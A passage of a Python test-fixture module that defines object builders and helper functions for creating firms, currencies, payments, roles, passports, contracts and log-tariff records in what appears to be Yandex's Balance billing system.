self).prepare(**params)\n\n\nclass PersonCategoryBuilder(ObjectBuilder):\n _class = mapper.PersonCategory\n\n def prepare(self, **params):\n self.b.country = params.pop('country', Getter(mapper.Country, 225))\n self.b.ur = params.pop('ur', 1)\n self.b.resident = params.pop('resident', 1)\n self.b.is_default = params.pop('is_default', 1)\n self.b.auto_only = 0\n self.b.category = '%s_%s' % (params.get('cc', 'cat'), get_big_number())\n\n from balance.person import mandatory_fields\n mandatory_fields[self.b.category] = tuple()\n\n self.b.oebs_country_code = params.pop('oebs_country_code', 66) # 6\n super(PersonCategoryBuilder, self).prepare(**params)\n\n\nclass FirmBuilder(ObjectBuilder):\n _class = mapper.Firm\n\n def prepare(self, **params):\n self.b.id = random.randint(2000, 9999)\n self.b.email = 'test@balance.yandex'\n self.b.payment_invoice_email = 'test@balance.yandex'\n self.b.phone = '-6(666)666-66-66'\n self.b.country = params.pop('country', Getter(mapper.Country, 225))\n self.b.default_iso_currency = 'RUB'\n super(FirmBuilder, self).prepare(**params)\n\n\nclass FirmInterbranchBuilder(ObjectBuilder):\n _class = mapper.FirmInterbranch\n\n def prepare(self, **params):\n self.b.id = get_big_number()\n self.b.firm = params.get('firm') or FirmBuilder()\n self.b.root_firm = 
params.get('root_firm') or FirmBuilder()\n self.b.contract = params.get('contract') or ContractBuilder()\n self.b.invoice_paysys_id = PAYSYS_ID\n super(FirmInterbranchBuilder, self).prepare(**params)\n\n\nclass YadocFirmBuilder(ObjectBuilder):\n _class = mapper.YadocFirm\n\n def prepare(self, **params):\n if not params.get('firm'):\n params.setdefault('firm_id', FirmId.YANDEX_OOO)\n params.setdefault('last_closed_dt', None)\n super(YadocFirmBuilder, self).prepare(**params)\n\n\nclass TaxPolicyPctBuilder(ObjectBuilder):\n _class = mapper.TaxPolicyPct\n\n def prepare(self, **params):\n self.b.id = get_big_number()\n self.b.hidden = 0\n super(TaxPolicyPctBuilder, self).prepare(**params)\n\n\nclass TaxPolicyBuilder(ObjectBuilder):\n _class = mapper.TaxPolicy\n\n def prepare(self, **params):\n self.b.id = get_big_number()\n self.b.name = 'some_tax'\n self.b.resident = params.pop('resident', 1)\n self.b.region_id = params.pop('region_id', 225)\n self.b.default_tax = 1\n self.b.hidden = 0\n\n tax_pcts = params.pop('tax_pcts', [18])\n\n def _cr_tax_pct(pct_param):\n pct_param = _mk_list(pct_param)\n\n if len(pct_param) == 1:\n nds_pct, = pct_param\n nsp_pct = 0\n dt = datetime.datetime(2000, 1, 1)\n elif len(pct_param) == 2:\n dt, nds_pct = pct_param\n nsp_pct = 0\n else:\n dt, nds_pct, nsp_pct = pct_param\n\n return TaxPolicyPctBuilder(\n tax_policy_id=self.b.id,\n dt=dt,\n nds_pct=nds_pct,\n nsp_pct=nsp_pct\n )\n\n self.b.taxes = map(_cr_tax_pct, tax_pcts)\n\n super(TaxPolicyBuilder, self).prepare(**params)\n\n\nclass FiasCity(ObjectBuilder):\n _class = mapper.fias.FiasCity\n\n\nclass PaysysBuilder(ObjectBuilder):\n _class = mapper.Paysys\n _generate_id = True\n\n def prepare(self, category='ur', **kwargs):\n self.b.category = category\n super(PaysysBuilder, self).prepare(**kwargs)\n\n\nclass FiasBuilder(ObjectBuilder):\n _class = mapper.Fias\n\n KLADR_CODE_LENGTH = 11\n\n def prepare(self, with_kladr=True, parent_fias=None, formal_name='formal_name', short_name=u'к.',\n postcode='123456', **kwargs):\n self.b.guid = str(uuid.uuid4())\n self.b.obj_level = 1\n self.b.live_status = 1\n self.b.center_status = 0\n self.b.formal_name = formal_name\n self.b.short_name = short_name\n self.b.postcode = postcode\n if with_kladr:\n self.b.kladr_code = generate_numeric_string(length=FiasBuilder.KLADR_CODE_LENGTH)\n if parent_fias:\n self.b.parent_guid = parent_fias.guid\n super(FiasBuilder, self).prepare(**kwargs)\n\n\nclass CurrencyBuilder(ObjectBuilder):\n _class = mapper.Currency\n\n def prepare(self, **kwargs):\n self.b.char_code = generate_character_string(length=4).upper()\n self.b.iso_code = generate_character_string(length=4).upper()\n self.b.num_code = get_big_number()\n self.b.weight = RANDOM.randint(1, 200)\n super(CurrencyBuilder, self).prepare(**kwargs)\n\n\nclass IsoCurrencyBuilder(ObjectBuilder):\n _class = mapper.IsoCurrency\n\n def prepare(self, **kwargs):\n self.b.alpha_code = generate_character_string(length=3).upper()\n super(IsoCurrencyBuilder, self).prepare(**kwargs)\n\n\nclass CurrencyRateBuilder(ObjectBuilder):\n _class = mapper.CurrencyRate\n\n\nclass DistributionTagBuilder(ObjectBuilder):\n _class = mapper.DistributionTag\n\n def prepare(self, client_id, tag_id=None, name='test_tag'):\n self.b.client_id = client_id\n self.b.name = name\n self.b.id = tag_id\n\n def build(self, session):\n if self.b.id is None:\n self.b.id = session.execute(\n \"SELECT s_test_distribution_tag_id.nextval AS tag_id FROM dual\"\n ).fetchone()['tag_id']\n return super(DistributionTagBuilder, 
self).build(session)\n\n\nclass PageDataBuilder(ObjectBuilder):\n _class = mapper.PageData\n\n def prepare(self, page_id=None, dt=None, desc=None, nds=None, **kwargs):\n self.b.page_id = page_id\n self.b.dt = dt or datetime.datetime.now()\n self.b.desc = desc or 'test page data'\n self.b.nds = nds or 0\n\n def build(self, session):\n if self.b.page_id is None:\n self.b.page_id = session.execute(\n \"select max(page_id)+1 as page_id from T_PAGE_DATA\"\n ).fetchone()['page_id']\n return super(PageDataBuilder, self).build(session)\n\n\nclass VerificationCodeBuilder(ObjectBuilder):\n _class = mapper.VerificationCode\n\n def prepare(self, **params):\n self.b.dt = datetime.datetime.now()\n super(VerificationCodeBuilder, self).prepare(**params)\n\n\nclass OverdraftParamsBuilder(ObjectBuilder):\n _class = mapper.OverdraftParams\n _generate_id = True\n\n def prepare(self, **params):\n client = ClientBuilder()\n self.b.client = client\n self.b.service_id = ServiceId.DIRECT\n self.b.person = PersonBuilder(client=client, type='ph')\n self.b.payment_method_cc = 'card'\n self.b.iso_currency = 'RUB'\n self.b.client_limit = 100\n super(OverdraftParamsBuilder, self).prepare(**params)\n\n\nclass ClientCashbackBuilder(ObjectBuilder):\n _class = mapper.ClientCashback\n\n def prepare(self, **params):\n if 'client_id' in params:\n self.b.client_id = params['client_id']\n else:\n self.b.client = params.pop('client', ClientBuilder())\n self.b.service_id = params.pop('service_id', ServiceId.DIRECT)\n self.b.iso_currency = params.pop('iso_currency', 'RUB')\n self.b.bonus = params.pop('bonus', D('1'))\n self.b.start_dt = params.pop('start_dt', None)\n self.b.finish_dt = params.pop('finish_dt', None)\n super(ClientCashbackBuilder, self).prepare(**params)\n\n\nclass CashbackUsageBuilder(ObjectBuilder):\n _class = mapper.CashbackUsage\n\n\nclass CashbackSettingsBuilder(ObjectBuilder):\n _class = mapper.ClientCashbackSettings\n\n\nclass PaymentBankBuilder(ObjectBuilder):\n _class = mapper.PaymentBank\n _generate_id = True\n\n def prepare(self, **params):\n self.b.name = 'ЗАО \"Банка\"'\n super(PaymentBankBuilder, self).prepare(**params)\n\n\nclass BankDetailsBuilder(ObjectBuilder):\n _class = mapper.BankDetails\n _generate_id = True\n\n def prepare(self, **params):\n self.b.payment_bank = PaymentBankBuilder()\n self.b.bank = params.pop('bank', 'ЗАО БАНК \"Мамой клянусь\"')\n self.b.iso_currency = 'RUR'\n super(BankDetailsBuilder, self).prepare(**params)\n\n\nclass ClientBankBuilder(ObjectBuilder):\n _class = mapper.ClientBank\n _generate_id = True\n\n def prepare(self, **params):\n self.b.is_alien_repr = params.pop('is_alien_repr', False)\n self.b.currency_code = params.pop('currency_code', 'RUR')\n self.b.iso_currency = mapper.Currency.fix_iso_code(self.b.currency_code)\n super(ClientBankBuilder, self).prepare(**params)\n\n\nclass TrustPaymentBuilder(ObjectBuilder):\n _class = payments.TrustPayment\n\n def prepare(self, **params):\n invoice = params.get('invoice', None)\n if not invoice:\n params['invoice'] = InvoiceBuilder()\n super(TrustPaymentBuilder, self).prepare(**params)\n\n\nclass SidePaymentBuilder(ObjectBuilder):\n _class = mapper.SidePayment\n\n def prepare(self, **params):\n if 'transaction_dt' not in params:\n self.b.transaction_dt = datetime.datetime.now()\n super(SidePaymentBuilder, self).prepare(**params)\n\n\nclass FiscalReceiptBuilder(ObjectBuilder):\n _class = mapper.FiscalReceipt\n\n def prepare(self, **params):\n params.setdefault('fiscal_receipt', {\n 'dt': 
datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n 'id': str(generate_int(6)),\n 'fp': str(generate_int(10)),\n 'fn': {\n 'sn': str(generate_int(16))\n },\n 'kkt': {\n 'rn': str(generate_int(13))\n },\n 'receipt_content': {\n 'receipt_type': params.pop('receipt_type', 'return_income')\n },\n 'receipt_calculated_content': {\n 'total': str(generate_int(3))\n },\n 'email': generate_character_string(25),\n 'invoice_id': str(generate_int(10)),\n 'service_id': str(generate_int(10))\n })\n super(FiscalReceiptBuilder, self).prepare(**params)\n\n\nclass RoleBuilder(ObjectBuilder):\n _class = mapper.Role\n\n def prepare(self, **params):\n self.b.name = 'test_role_name'\n super(self.__class__, self).prepare(**params)\n\n\nclass RoleClientGroupBuilder(ObjectBuilder):\n _class = mapper.RoleClientGroup\n\n def prepare(self, **params):\n self._clients = params.pop('clients', [])\n super(RoleClientGroupBuilder, self).prepare(**params)\n\n def build(self, session):\n if self.b.get('client_batch_id') is None:\n self.b.client_batch_id = session.execute(sa.func.next_value(sa.Sequence('s_client_batch_id'))).scalar()\n\n if self.b.get('external_id') is None:\n self.b.external_id = get_big_number()\n\n refresh_dt = self.b.get('refresh_dt')\n for client in self._clients:\n params = {\n 'client': client,\n 'client_batch_id': self.b.client_batch_id,\n }\n if refresh_dt:\n params['update_dt'] = refresh_dt\n RoleClientBuilder.construct(session, **params)\n\n super(RoleClientGroupBuilder, self).build(session)\n return self\n\n\nclass RoleClientBuilder(ObjectBuilder):\n _class = mapper.RoleClient\n\n def prepare(self, **params):\n self._group_id = params.pop('group_id', None)\n\n if not (params.get('client') or params.get('client_id')):\n params['client'] = ClientBuilder()\n\n super(RoleClientBuilder, self).prepare(**params)\n\n def build(self, session):\n if self.b.get('client_batch_id') is None:\n if self._group_id:\n self.b.client_batch_id = RoleClientGroupBuilder.construct(session,\n external_id=self._group_id).client_batch_id\n else:\n self.b.client_batch_id = session.execute(sa.func.next_value(sa.Sequence('s_client_batch_id'))).scalar()\n\n super(RoleClientBuilder, self).build(session)\n return self\n\n\nclass RoleClientPassportBuilder(ObjectBuilder):\n _class = mapper.RoleClientPassport\n\n def prepare(self, **params):\n if not (params.get('role') or params.get('role_id')):\n self.b.role_id = RoleType.REPRESENTATIVE\n if not (params.get('client') or params.get('client_id')):\n self.b.client = ClientBuilder()\n if not (params.get('passport') or params.get('passport_id')):\n self.b.passport = PassportBuilder()\n super(RoleClientPassportBuilder, self).prepare(**params)\n\n\nclass TariffGroupBuilder(ObjectBuilder):\n _class = mapper.TariffGroup\n\n def prepare(self, **params):\n self.b.cc = 'test_tariff_group_cc'\n self.b.service_id = params.pop('service_id', ServiceId.APIKEYS)\n super(TariffGroupBuilder, self).prepare(**params)\n\n\nclass TariffBuilder(ObjectBuilder):\n _class = mapper.Tariff\n\n def prepare(self, **params):\n self.b.cc = 'test_tariff_cc'\n self.b.tariff_group = TariffGroupBuilder()\n super(TariffBuilder, self).prepare(**params)\n\n\nclass ProdSeasonCoeffBuilder(ObjectBuilder):\n _class = mapper.ProdSeasonCoeff\n\n\nclass PartnerBalanceCache(ObjectBuilder):\n _class = mapper.PartnerBalanceCache\n\n\nclass CartItemBuilder(ObjectBuilder):\n _class = mapper.CartItem\n\n def prepare(self, **params):\n client = params.get('client', None)\n client_id = params.get('client_id', None)\n if not (client 
or client_id):\n params['client'] = ClientBuilder()\n\n order = params.get('order', None)\n service_id = params.get('service_id', None)\n service_order_id = params.get('service_order_id', None)\n if not (order or (service_id and service_order_id)):\n params['order'] = OrderBuilder()\n\n params.setdefault('quantity', D('12.34'))\n\n super(CartItemBuilder, self).prepare(**params)\n\n\nclass ServiceNotifyParamsBuilder(ObjectBuilder):\n _class = mapper.ServiceNotifyParams\n\n def prepare(self, **params):\n from notifier.data_objects import JSON_REST\n\n service = params.get('service', None)\n service_id = params.get('service_id', None)\n if not (service or service_id):\n params['service'] = ServiceBuilder()\n\n url_scheme = params.pop('url_scheme', 'https')\n params.setdefault('url', '{}://service.yandex.net/api'.format(url_scheme))\n params.setdefault('test_url', '{}://service-dev.yandex.net/api'.format(url_scheme))\n\n params.setdefault('hidden', False)\n params.setdefault('version', 1)\n params.setdefault('protocol', JSON_REST)\n params.setdefault('iface_version', 3)\n params.setdefault('tvm_alias', generate_character_string(10))\n\n super(ServiceNotifyParamsBuilder, self).prepare(**params)\n\n\nclass RefundBuilder(ObjectBuilder):\n _class = mapper.Refund\n\n\nclass TerminalBuilder(ObjectBuilder):\n _class = mapper.Terminal\n _generate_id = True\n\n def prepare(self, **params):\n self.b.dt = datetime.datetime.now()\n self.b.payment_method_id = 1001\n self.b.currency = 'RUB'\n super(TerminalBuilder, self).prepare(**params)\n\n\nclass ProcessingBuilder(ObjectBuilder):\n _class = mapper.Processing\n _generate_id = True\n\n def prepare(self, **params):\n self.b.dt = datetime.datetime.now()\n self.b.cc = 'TEST'\n self.b.name = 'Test_Name'\n self.b.payment_method_id = 1000\n super(ProcessingBuilder, self).prepare(**params)\n\n\nclass InvoiceRefundBuilder(ObjectBuilder):\n _class = mapper.OEBSInvoiceRefund\n\n def prepare(self, **params):\n self.b.status_code = InvoiceRefundStatus.not_exported\n super(InvoiceRefundBuilder, self).prepare(**params)\n\n def postprocess(self):\n self.b.invoice.notify_unused_funds()\n\n\nclass TrustInvoiceRefundBuilder(ObjectBuilder):\n _class = mapper.TrustApiCPFInvoiceRefund\n\n def prepare(self, **params):\n self.b.status_code = InvoiceRefundStatus.uninitialized\n super(TrustInvoiceRefundBuilder, self).prepare(**params)\n\n\nclass InvoiceTransferBuilder(ObjectBuilder):\n _class = mapper.InvoiceTransfer\n\n def prepare(self, **params):\n self.b.status_code = InvoiceTransferStatus.not_exported\n super(InvoiceTransferBuilder, self).prepare(**params)\n\n\nclass NirvanaClonedWorkflowBuilder(ObjectBuilder):\n _class = mapper.NirvanaClonedWorkflow\n\n def prepare(self, **params):\n current_dt = datetime.datetime.now()\n self.b.dt = datetime.datetime(current_dt.year, current_dt.month, 1)\n self.b.mnclose_task = 'mnclose_task'\n self.b.original_id = 'workflow-instance-to-be-cloned'\n self.b.instance_id = 'cloned-instance-id'\n\n super(NirvanaClonedWorkflowBuilder, self).prepare(**params)\n\n\nclass NirvanaMnCloseSyncBuilder(ObjectBuilder):\n _class = mapper.NirvanaMnCloseSync\n\n def prepare(self, **kwargs):\n self.b.task_id = kwargs.pop('task_id', 'mnclose_task_id')\n current_dt = datetime.datetime.now()\n self.b.dt = kwargs.pop('dt', datetime.datetime(current_dt.year, current_dt.month, 1))\n self.b.status = kwargs.pop('status', NirvanaTaskStatus.TASK_STATUS_NEW_UNOPENABLE)\n self.b.changed_dt = current_dt\n\n super(NirvanaMnCloseSyncBuilder, 
self).prepare(**kwargs)\n\n\nclass ProductNameBuilder(ObjectBuilder):\n _class = mapper.ProductName\n\n def prepare(self, **params):\n params.setdefault('product', ProductBuilder())\n params.setdefault('lang_id', LanguageId.RU)\n if 'product_name' not in params:\n product_name = params['product'].name\n if isinstance(product_name, unicode):\n format_string = u'{}_{}'\n else:\n format_string = '{}_{}'\n params['product_name'] = format_string.format(product_name, params['lang_id'])\n super(ProductNameBuilder, self).prepare(**params)\n\n\nclass ThirdPartyTransactionBuilder(ObjectBuilder):\n _class = mapper.ThirdPartyTransaction\n _generate_id = True\n\n def prepare(self, **kwargs):\n current_dt = datetime.datetime.now()\n self.b.dt = datetime.datetime(current_dt.year, current_dt.month, 1)\n self.b.contract = kwargs.get('contract')\n super(ThirdPartyTransactionBuilder, self).prepare(**kwargs)\n\n\nclass NirvanaBlockBuilder(ObjectBuilder):\n _class = mapper.NirvanaBlock\n\n def prepare(self, **kwargs):\n current_dt = datetime.datetime.now()\n self.b.dt = datetime.datetime(current_dt.year, current_dt.month, 1)\n self.b.operation = 'run_mnclose_task'\n self.b.instance_id = str(uuid.uuid4())\n self.b.terminate = 0\n self.b.request = kwargs.pop('request', {'data': {'options': {}}})\n self.b.response = {}\n self.b.status = self._class.Status.RUNNING\n self.b.pid = os.getpid()\n\n super(NirvanaBlockBuilder, self).prepare(**kwargs)\n\n def add_input(self, name, data_type='text', download_url=None):\n inputs = self.b.request['data'].setdefault('inputs', dict())\n input_ = inputs.setdefault(name, dict(name=name, type='INPUT', items=list()))\n\n input_items = input_['items']\n current_index = len(input_items)\n\n if download_url is None:\n download_url = 'http://localhost/nirvana/api/storage/{}/data'.format(current_index)\n\n input_['items'].append({\n 'dataType': data_type,\n 'downloadURL': download_url,\n 'fileName': '{}_{}'.format(current_index, name),\n })\n return self\n\n def add_output(self, name, data_type='text', upload_url=None):\n outputs = self.b.request['data'].setdefault('outputs', dict())\n output = outputs.setdefault(name, dict(name=name, type='OUTPUT', items=list()))\n\n output_items = output['items']\n current_index = len(output_items)\n\n if upload_url is None:\n upload_url = 'mds-s3://localhost/s3/nirvana/{}'.format(current_index)\n\n output['items'].append({\n 'dataType': data_type,\n 'uri': upload_url,\n 'fileName': '{}_{}'.format(current_index, name)\n })\n return self\n\n\nclass ReportBuilder(ObjectBuilder):\n _class = mapper.Report\n\n def prepare(self, **kwargs):\n self.b.request_dt = datetime.datetime.now()\n self.b.create_dt = datetime.datetime.now()\n self.b.params = {}\n super(ReportBuilder, self).prepare(**kwargs)\n\n def build(self, session):\n if self.b.get('key') is None:\n self.b.key = ('unittest666/'\n + str(session.execute(sa.sql.functions.next_value(sa.Sequence('s_mds_id'))).scalar())\n + '.xls')\n\n if self.b.get('passport_id') is None:\n self.b.passport_id = PassportBuilder.construct(session).passport_id\n\n return super(ReportBuilder, self).build(session)\n\n\nclass TVMACLAppBuidler(ObjectBuilder):\n _class = mapper.TVMACLApp\n\n def prepare(self, **params):\n params.setdefault('env', 'test')\n super(TVMACLAppBuidler, self).prepare(**params)\n\n\nclass TVMACLAllowedServiceBuilder(ObjectBuilder):\n _class = mapper.TVMACLAllowedServiceTable\n\n\nclass TVMACLPermissionBuilder(ObjectBuilder):\n _class = mapper.TVMACLPermissionTable\n\n\nclass 
TVMACLGroupBuilder(ObjectBuilder):\n _class = mapper.TVMACLGroup\n\n\nclass TVMACLGroupMethodBuilder(ObjectBuilder):\n _class = mapper.TVMACLGroupMethod\n\n\nclass TVMACLGroupPermissionBuilder(ObjectBuilder):\n _class = mapper.TVMACLGroupPermission\n\n\nclass RestrictedDomainBuilder(ObjectBuilder):\n _class = mapper.RestrictedDomain\n\n\nclass RestrictedPersonParamBuilder(ObjectBuilder):\n _class = mapper.RestrictedPersonParams\n\n\ndef create_client_service_data(migrate_to_currency_dt=datetime.datetime.now(), currency='RUB',\n currency_convert_type=CONVERT_TYPE_COPY, service_id=ServiceId.DIRECT):\n client_service_data = mapper.ClientServiceData(service_id)\n client_service_data.iso_currency = currency\n client_service_data.migrate_to_currency = migrate_to_currency_dt\n client_service_data.convert_type = currency_convert_type\n return client_service_data\n\n\ndef create_pay_policy_service(session, service_id, firm_id, paymethods_params=None, category=None, legal_entity=None,\n is_atypical=False,\n **kwargs):\n pay_policy_service_id = get_big_number()\n session.execute('''insert into bo.t_pay_policy_service (id, service_id, firm_id, legal_entity, category, is_atypical)\n values (:id, :service_id, :firm_id, :legal_entity, :category, :is_atypical)''',\n {'id': pay_policy_service_id, 'service_id': service_id, 'firm_id': firm_id,\n 'legal_entity': legal_entity, 'category': category, 'is_atypical': int(is_atypical)})\n if paymethods_params:\n for currency, pm_id in paymethods_params:\n create_pay_policy_payment_method(session, pay_policy_service_id=pay_policy_service_id, iso_currency=currency,\n payment_method_id=pm_id, hidden=0, **kwargs)\n session.flush()\n return pay_policy_service_id\n\n\ndef create_pay_policy_payment_method(session, pay_policy_service_id, iso_currency, payment_method_id, paysys_group_id=0,\n hidden=0, **kwargs):\n payment_method = Getter(mapper.PaymentMethod, payment_method_id).build(session).obj\n pay_policy_payment_method_id = get_big_number()\n pp = mapper.PayPolicyPaymentMethod(id=pay_policy_payment_method_id, pay_policy_service_id=pay_policy_service_id,\n iso_currency=iso_currency, payment_method=payment_method,\n paysys_group_id=paysys_group_id, hidden=hidden)\n session.add(pp)\n session.flush()\n return pp\n\n\ndef create_pay_policy_region(session, pay_policy_service_id, region_id=None, region_group_id=None, is_contract=None,\n is_agency=None, hidden=0, **kwargs):\n if is_contract is not None:\n is_contract = int(is_contract)\n if is_agency is not None:\n is_agency = int(is_agency)\n assert region_id is None or region_group_id is None\n pay_policy_region_id = get_big_number()\n if region_group_id:\n session.execute('''\n insert into bo.t_pay_policy_region (id, region_group_id, is_agency, is_contract, pay_policy_service_id, hidden)\n values (:id, :region_group_id, :is_agency, :is_contract, :pay_policy_service_id, :hidden)\n ''', {'id': pay_policy_region_id, 'pay_policy_service_id': pay_policy_service_id,\n 'region_group_id': region_group_id, 'is_contract': is_contract, 'is_agency': is_agency, 'hidden': hidden})\n if region_id:\n session.execute('''\n insert into bo.t_pay_policy_region (id, region_id, is_agency, is_contract, pay_policy_service_id, hidden)\n values (:id, :region_id, :is_agency, :is_contract, :pay_policy_service_id, :hidden)\n ''', {'id': pay_policy_region_id, 'pay_policy_service_id': pay_policy_service_id, 'region_id': region_id,\n 'is_contract': is_contract, 'is_agency': is_agency, 'hidden': hidden})\n\n\ndef create_pay_policy_region_group(session, 
region_group_id, regions):\n region_group_name = generate_character_string()\n session.execute('''\n insert into bo.t_pay_policy_region_group_name (region_group_id, region_group_name)\n values (:region_group_id, :region_group_name)\n ''', {'region_group_id': region_group_id, 'region_group_name': region_group_name})\n for region in regions:\n pay_policy_region_group_id = get_big_number()\n session.execute('''\n insert into bo.t_pay_policy_region_group (id, region_group_id, region_id)\n values (:id, :region_group_id, :region_id)\n ''', {'id': pay_policy_region_group_id, 'region_group_id': region_group_id, 'region_id': region})\n\n\ndef create_permission(session, perm_code):\n permission = mapper.Permission(\n code=perm_code,\n )\n session.add(permission)\n session.flush()\n return permission\n\n\ndef create_role(session, *permissions, **kwargs):\n role = mapper.Role(\n id=get_big_number(),\n name=kwargs.get('name', str(get_big_number()))\n )\n session.add(role)\n if any(permissions):\n for perm_info in permissions:\n if not isinstance(perm_info, basestring) and isinstance(perm_info, collections.Iterable):\n perm_code, constraints = perm_info\n else:\n perm_code, constraints = perm_info, None\n\n if isinstance(perm_code, basestring):\n perm = create_permission(session, perm_code)\n else:\n perm = perm_code\n\n role_perm = mapper.RolePermission(\n role=role,\n permission=perm,\n constraints=constraints\n )\n session.add(role_perm)\n session.flush()\n return role\n\n\ndef get_domain_uid_value():\n return random.randint(INTRA_MIN(), INTRA_MAX())\n\n\ndef create_passport(session, *roles, **kwargs):\n patch_session = kwargs.get('patch_session', False)\n passport = PassportBuilder(**kwargs).build(session).obj\n for role_info in roles:\n if role_info is None:\n continue\n\n if not isinstance(role_info, collections.Iterable):\n role_info = (role_info,)\n\n role, firm_id, client_batch_id = (role_info + (None, None))[:3]\n\n passport_role = mapper.RealRolePassport(\n session,\n passport=passport,\n role=role,\n firm_id=firm_id,\n client_batch_id=client_batch_id,\n )\n session.add(passport_role)\n\n session.flush()\n if patch_session:\n session.oper_id = passport.passport_id\n try:\n del session.oper_perms\n except AttributeError:\n pass\n session._passport = passport\n return passport\n\n\ndef create_passport_manager(passport):\n return SingleManagerBuilder(\n passport_id=passport.passport_id,\n domain_login=passport.login\n ).build(passport.session).obj\n\n\ndef create_credit_contract(session, client=None, person=None, **kwargs):\n pc = PayOnCreditCase(session)\n client = client or ClientBuilder(is_agency=True)\n person = person or PersonBuilder(client=client, type='ur')\n\n params = dict(\n dt=datetime.datetime.now() - datetime.timedelta(days=66),\n commission=ContractTypeId.COMMISSION,\n payment_type=3,\n credit_type=1,\n payment_term=30,\n payment_term_max=60,\n personal_account=1,\n personal_account_fictive=1,\n currency=810,\n lift_credit_on_payment=1,\n commission_type=52,\n repayment_on_consume=1,\n credit_limit_single=1666666,\n services={7},\n is_signed=1,\n firm=1,\n )\n params.update(kwargs)\n return pc.get_contract(client=client, person=person, **params)\n\n\ndef create_correction_payment(invoice):\n invoice.session.execute(\n 'insert into bo.t_correction_payment (dt, doc_date, sum, memo, invoice_eid) '\n 'VALUES (to_date(:paymentDate,\\'DD.MM.YYYY HH24:MI:SS\\'),'\n 'to_date(:paymentDate,\\'DD.MM.YYYY HH24:MI:SS\\'),'\n ':total_sum,'\n '\\'Testing\\','\n ':external_id)',\n {'paymentDate': 
invoice.dt,\n 'total_sum': invoice.total_sum.as_decimal(),\n 'external_id': invoice.external_id})\n\n\ndef create_comsn_type_discount_types(session, commission_type_id, discount_type_ids):\n for discount_type_id in discount_type_ids:\n session.execute(\n \"\"\"insert into bo.t_comsn_type_discount_types (contract_comsn_type_id, discount_type_id)\n VALUES (:commission_type_id, :discount_type_id)\"\"\",\n {'commission_type_id': commission_type_id,\n 'discount_type_id': discount_type_id})\n\n\ndef create_contract_commission_type(session):\n seq = session.execute(sa.Sequence('S_CONTRACT_COMSN_TYPE_ID'))\n session.execute(\n \"\"\"insert into bo.T_CONTRACT_COMSN_TYPE (id, name)\n VALUES (:id, :name)\"\"\",\n {'name': 'comsn_name' + str(get_big_number()),\n 'id': seq})\n return seq\n\n\ndef set_roles(session, passport=None, roles=None):\n roles = roles or []\n passport = passport or session.passport\n\n with mock.patch('butils.passport.passport_admsubscribe'): # don't hit the passport API\n passport.set_roles(roles)\n\n # Clean up permissions cache\n def delattr_safe(o, name):\n if hasattr(o, name):\n delattr(o, name)\n\n delattr_safe(passport, '_perms_cache')\n delattr_safe(session, 'oper_perms')\n\n\ndef set_repr_client(session, passport, client):\n RoleClientPassportBuilder.construct(\n session,\n passport=passport,\n client=client,\n )\n session.flush()\n\n\nclass BadDebtActBuilder(ObjectBuilder):\n _class = mapper.BadDebtAct\n\n def prepare(self, **kwargs):\n self.b.act = kwargs['act']\n self.b.oper_uid = None\n self.b.commentary = None\n self.b.our_fault = False\n\n super(BadDebtActBuilder, self).prepare(**kwargs)\n\n\nclass YTLogLoadTypeBuilder(ObjectBuilder):\n _class = mapper.YtLogLoadType\n _generate_id = True\n\n def prepare(self, **kwargs):\n self.b.cc = kwargs.pop('cc', generate_character_string())\n self.b.table_name = kwargs.pop('table_name', 'bo.t_log_tariff_act_row')\n self.b.partition_col_name = kwargs.pop('partition_col_name', 'log_type_id')\n super(YTLogLoadTypeBuilder, self).prepare(**kwargs)\n\n\nclass YTLogLoadTaskBuilder(ObjectBuilder):\n _class = mapper.YtLogLoadTask\n\n def prepare(self, **kwargs):\n self.b.external_id = generate_character_string()\n self.b.task_type = kwargs.pop('task_type', YTLogLoadTypeBuilder())\n self.b.state = kwargs.pop('state', NirvanaProcessingTaskState.IN_PROGRESS)\n self.b.cluster_name = kwargs.pop('cluster_name', 'some_cluster')\n self.b.table_path = kwargs.pop('table_path', 'some_table')\n super(YTLogLoadTaskBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffTypeBuilder(ObjectBuilder):\n _class = mapper.LogTariffType\n\n def prepare(self, **kwargs):\n self.b.id = kwargs.pop('id', generate_character_string())\n super(LogTariffTypeBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffTaskBuilder(ObjectBuilder):\n _class = mapper.LogTariffTask\n\n def prepare(self, **kwargs):\n self.b.task_type = kwargs.pop('task_type', LogTariffTypeBuilder())\n self.b.metadata = kwargs.pop('metadata', {})\n self.b.state = NirvanaProcessingTaskState.IN_PROGRESS\n super(LogTariffTaskBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffOrderBuilder(ObjectBuilder):\n _class = mapper.LogTariffOrder\n\n def prepare(self, **kwargs):\n self.b.task = kwargs.pop('task', None) or LogTariffTaskBuilder()\n super(LogTariffOrderBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffConsumeBuilder(ObjectBuilder):\n _class = mapper.LogTariffConsume\n\n def prepare(self, **kwargs):\n self.b.consume_qty = kwargs.get('qty')\n self.b.consume_sum = kwargs.get('sum')\n 
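# qty/sum are read with get() rather than pop(), so they both seed the\n # consume_* totals here and stay in kwargs for prepare() below.\n 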
super(LogTariffConsumeBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffMigrationOrderLoadBuilder(ObjectBuilder):\n _class = mapper.LogTariffMigrationOrderLoad\n\n\nclass LogTariffMigrationOrderBuilder(ObjectBuilder):\n _class = mapper.LogTariffMigrationOrder\n\n def prepare(self, order, **kwargs):\n self.b.task = kwargs.pop('task', LogTariffTaskBuilder())\n self.b.service_id = order.service_id\n self.b.service_order_id = order.service_order_id\n super(LogTariffMigrationOrderBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffMigrationInputBuilder(ObjectBuilder):\n _class = mapper.LogTariffMigrationInput\n\n\nclass LogTariffMigrationUntariffedBuilder(ObjectBuilder):\n _class = mapper.LogTariffMigrationUntariffed\n\n def prepare(self, order, **kwargs):\n self.b.task_id = kwargs.pop('task', LogTariffTaskBuilder()).id\n migration_order = kwargs.pop('migration_order', LogTariffMigrationOrderBuilder(order=order))\n self.b.migration_order = migration_order\n self.b.service_id = order.service_id\n self.b.service_order_id = order.service_order_id\n self.b.tariff_dt = kwargs.pop('tariff_dt', datetime.datetime.now())\n self.b.product_id = order.service_code\n self.b.overcompletion_qty = kwargs.pop('overcompletion_qty', 0)\n super(LogTariffMigrationUntariffedBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffMigrationConsumeBuilder(ObjectBuilder):\n _class = mapper.LogTariffMigrationConsume\n\n def prepare(self, consume, **kwargs):\n self.b.task_id = 